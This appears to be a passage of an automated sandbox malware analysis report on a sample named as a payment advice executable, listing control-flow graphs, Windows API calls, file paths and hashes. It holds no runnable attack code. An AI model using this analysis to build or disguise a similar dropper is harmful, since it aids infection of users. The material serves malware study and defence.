                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                                          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                          • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                          • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 744 405772-405798 call 405a3d 747 4057b1-4057b8 744->747 748 40579a-4057ac DeleteFileW 744->748 750 4057ba-4057bc 747->750 751 4057cb-4057db call 405eea 747->751 749 40592e-405932 748->749 752 4057c2-4057c5 750->752 753 4058dc-4058e1 750->753 757 4057ea-4057eb call 405981 751->757 758 4057dd-4057e8 lstrcatW 751->758 752->751 752->753 753->749 756 4058e3-4058e6 753->756 759 4058f0-4058f8 call 40622d 756->759 760 4058e8-4058ee 756->760 761 4057f0-4057f4 757->761 758->761 759->749 767 4058fa-40590e call 405935 call 40572a 759->767 760->749 764 405800-405806 lstrcatW 761->764 765 4057f6-4057fe 761->765 768 40580b-405827 lstrlenW FindFirstFileW 764->768 765->764 765->768 784 405910-405913 767->784 785 405926-405929 call 405194 767->785 770 4058d1-4058d5 768->770 771 40582d-405835 768->771 770->753 775 4058d7 770->775 772 405855-405869 call 405eea 771->772 773 405837-40583f 771->773 786 405880-40588b call 40572a 772->786 787 40586b-405873 772->787 776 405841-405849 773->776 777 4058b4-4058c4 FindNextFileW 773->777 775->753 776->772 780 40584b-405853 776->780 777->771 783 4058ca-4058cb FindClose 777->783 780->772 780->777 783->770 784->760 788 405915-405924 call 405194 call 405d84 784->788 785->749 797 4058ac-4058af call 405194 786->797 798 40588d-405890 786->798 787->777 789 405875-40587e call 405772 787->789 788->749 789->777 797->777 801 405892-4058a2 call 405194 call 405d84 798->801 802 4058a4-4058aa 798->802 801->777 802->777
                                                                                                                                          APIs
                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040579B
                                                                                                                                          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 004057E3
                                                                                                                                          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 00405806
                                                                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040580C
                                                                                                                                          • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040581C
                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                          Strings
                                                                                                                                          • "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe", xrefs: 0040577B
                                                                                                                                          • \*.*, xrefs: 004057DD
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                          • API String ID: 2035342205-3119803337
                                                                                                                                          • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                          • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                          • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                          • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                          • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                          • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                          • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406238
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                          • String ID: WB
                                                                                                                                          • API String ID: 2295610775-2854515933
                                                                                                                                          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                          • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                                          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                          • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                          • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                          • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 247 403919-40392a call 405db7 241->247 248 40392f-403935 lstrcatW 241->248 251 40393a-403963 call 403b8a call 405a3d 242->251 247->248 248->251 256 4039f5-4039fd call 405a3d 251->256 257 403969-40396e 251->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 259 403974-40399c call 405db7 257->259 259->256 265 40399e-4039a2 259->265 267 403ab1-403ab9 call 40140b 263->267 268 403a32-403a62 RegisterClassW 263->268 264->263 269 4039b4-4039c0 lstrlenW 265->269 270 4039a4-4039b1 call 405962 265->270 281 403ac3-403ace call 403b8a 267->281 282 403abb-403abe 267->282 271 403b80 268->271 272 403a68-403aac SystemParametersInfoW CreateWindowExW 268->272 276 4039c2-4039d0 lstrcmpiW 269->276 277 4039e8-4039f0 call 405935 call 405eea 269->277 270->269 274 403b82-403b89 271->274 272->267 276->277 280 4039d2-4039dc GetFileAttributesW 276->280 277->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->274 284->277 285->277 285->284 294 403af3-403af8 LoadLibraryW 291->294 295 403afa-403b0c GetClassInfoW 291->295 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 294->295 296 403b24-403b47 DialogBoxParamW call 40140b 295->296 297 403b0e-403b1e GetClassInfoW RegisterClassW 295->297 302 403b4c-403b55 call 403804 296->302 297->296 300->282 303 403b6d-403b74 call 40140b 300->303 301->271 302->274 303->282
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 00403935
                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\foreslaaende), ref: 00403A1C
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                          • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                          • API String ID: 914957316-2256041598
                                                                                                                                          • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                          • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                          • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                          • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 323 403cb6-403cbc 316->323 324 403c9e-403cb0 ShowWindow 316->324 328 403e67-403e82 318->328 320 403e24-403e2f call 401389 319->320 321 403e55-403e57 319->321 320->321 342 403e31-403e50 SendMessageW 320->342 321->318 327 4040fc 321->327 329 403cd8-403cdb 323->329 330 403cbe-403cd3 DestroyWindow 323->330 324->323 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 345 403e97-403ea2 334->345 346 4040ba-4040d3 DestroyWindow EndDialog 334->346 336->327 343 4040e1-4040e7 336->343 338->335 340 403d97-403da5 call 404196 339->340 341 403cfa-403d0b GetDlgItem 339->341 340->335 347 403d2a-403d2d 341->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 341->348 342->335 343->327 350 4040e9-4040f2 ShowWindow 343->350 345->346 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 345->351 346->336 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->340 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->340 361->356 366 403d52-403d58 call 40140b 362->366 367 403d67-403d70 call 40140b 362->367 377 403d5e 366->377 367->340 376 403d72-403d7c 367->376 376->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                                                          APIs
                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                          • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                          • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                          • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                          • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                          • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                          • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 432 403013-403018 424->432 433 402f48-402f4b 424->433 427 402e63 425->427 428 402e65-402e72 call 4032f9 425->428 427->428 434 402e78-402e7e 428->434 435 402fcf-402fd7 call 402d1a 428->435 432->417 436 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 433->436 437 402f4d-402f65 call 40330f call 4032f9 433->437 438 402e80-402e98 call 405b11 434->438 439 402efe-402f02 434->439 435->432 463 402fc5-402fca 436->463 464 402fd9-403009 call 40330f call 403062 436->464 437->432 460 402f6b-402f71 437->460 444 402f0b-402f11 438->444 458 402e9a-402ea1 438->458 443 402f04-402f0a call 402d1a 439->443 439->444 443->444 450 402f13-402f21 call 406302 444->450 451 402f24-402f2e 444->451 450->451 451->424 451->425 458->444 462 402ea3-402eaa 458->462 460->432 460->436 462->444 465 402eac-402eb3 462->465 463->417 472 40300e-403011 464->472 465->444 467 402eb5-402ebc 465->467 467->444 469 402ebe-402ede 467->469 469->432 471 402ee4-402ee8 469->471 474 402ef0-402ef8 471->474 475 402eea-402eee 471->475 472->432 473 40301a-40302b 472->473 476 403033-403038 473->476 477 40302d 473->477 474->444 478 402efa-402efc 474->478 475->424 475->474 479 403039-40303f 476->479 477->476 478->444 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,00000400), ref: 00402DEC
